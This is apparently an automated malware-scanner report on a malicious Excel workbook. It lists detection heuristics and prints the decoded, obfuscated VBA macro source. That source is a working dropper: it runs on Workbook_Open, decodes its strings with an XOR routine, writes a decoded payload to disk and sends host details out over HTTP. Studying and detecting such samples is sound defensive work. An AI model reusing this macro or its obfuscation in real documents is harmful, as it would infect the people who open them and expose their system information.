MALICIOUS
158
Risk Score
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set zdit = CreateObject(p) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(1), "") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
If Len(Environ(ppwfzxtalv(29))) > 0 Then -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4099 bytes |
SHA-256: aeb7ec78105804e0a2f407107e9897c067cb5c320549f6cf2f68699cc87f2a3d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "T, 281, 1, MSForms, TextBox"
Public zdit As Object
Function hwqincirqo() As String
On Error GoTo p:
Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(1), "")
x = CallByName(a, ppwfzxtalv(2), VbGet)
x = x & ppwfzxtalv(3) & CallByName(a, ppwfzxtalv(4), VbGet)
x = x & ppwfzxtalv(3) & CallByName(a, ppwfzxtalv(6), VbGet)
x = x & ppwfzxtalv(3) & CallByName(Application, ppwfzxtalv(8), VbGet)
hwqincirqo = x
Exit Function
p:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function jbrulhvcvl()
On Error GoTo g:
Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(12), "")
x = ppwfzxtalv(13)
p = ppwfzxtalv(14) & CallByName(Application, ppwfzxtalv(15), VbGet) & ppwfzxtalv(16)
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(18), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(20), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(22), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(24), 1, x
CallByName a, ppwfzxtalv(17), VbMethod, p & ppwfzxtalv(26), 1, x
Set v = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(28), "")
If Len(Environ(ppwfzxtalv(29))) > 0 Then
CallByName v, ppwfzxtalv(30), VbMethod, ppwfzxtalv(31), Environ(ppwfzxtalv(32)) & ppwfzxtalv(33)
Else
CallByName v, ppwfzxtalv(30), VbMethod, ppwfzxtalv(35), Environ(ppwfzxtalv(32)) & ppwfzxtalv(33)
End If
CallByName a, ppwfzxtalv(17), VbMethod, ppwfzxtalv(39), Environ(ppwfzxtalv(32)) & ppwfzxtalv(41) & Environ(ppwfzxtalv(32)) & ppwfzxtalv(43), ppwfzxtalv(44)
Open Environ(ppwfzxtalv(32)) & ppwfzxtalv(43) For Output As #1
Print #1, qebkwmdhsn(CallByName(F, ppwfzxtalv(47), VbGet))
Close #1
Exit Function
g:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function qebkwmdhsn(b As String) As String
On Error GoTo a:
x = T.Text & ThisWorkbook.Name
p = ""
v = 0
For g = 1 To Len(b) Step 4
k = Asc(Mid(x, (v Mod Len(x) + 1), 1))
j = Left(b, 4)
j = j Xor 9
j = j - k
b = Right(b, Len(b) - 4)
v = v + 1
p = p + Chr(j Xor k)
Next g
qebkwmdhsn = p
Exit Function
a:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function wvzmlrfmqu()
On Error GoTo x:
Dim p As String
p = ppwfzxtalv(52)
Set zdit = CreateObject(p)
jbrulhvcvl
Dim a As Object
Set a = CallByName(zdit, ppwfzxtalv(0), VbMethod, ppwfzxtalv(54), "")
CallByName a, ppwfzxtalv(55), VbMethod, ppwfzxtalv(56), ppwfzxtalv(57) & hwqincirqo, False
CallByName a, ppwfzxtalv(58), VbMethod, ""
CallByName a, ppwfzxtalv(59), VbMethod
Exit Function
x:
MsgBox ppwfzxtalv(9), vbCritical, ppwfzxtalv(10)
End Function
Function ppwfzxtalv(a) As String
x = Split(F.T.Text, ".")
Dim p As String
p = x(a)
ppwfzxtalv = qebkwmdhsn(p)
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Sheet1.wvzmlrfmqu
End Sub
Attribute VB_Name = "F"
Attribute VB_Base = "0{91EC92EB-9F4D-4A5A-A1D0-3367C1AB6250}{37247A1D-4E60-4A89-88F4-BED303B46CB5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.